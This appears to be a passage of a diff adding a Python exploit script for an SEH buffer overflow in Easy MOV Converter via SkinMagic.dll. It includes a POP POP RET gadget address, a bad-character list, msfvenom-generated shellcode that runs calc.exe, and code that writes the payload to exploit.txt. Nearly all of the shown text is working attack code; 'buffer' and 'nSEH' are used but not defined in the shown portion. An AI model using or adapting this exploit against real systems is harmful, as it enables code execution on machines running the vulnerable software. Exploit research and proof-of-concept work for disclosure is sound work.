+# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
+SEH = "\x5c\x14\x01\x10"
+
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+junk = "\x90" * 16
+
+badchars = "\x0a\x0d"
+
+data = buffer + nSEH + SEH + junk + buf
+
+f = open ("exploit.txt", "w")
+f.write(data)
+f.close()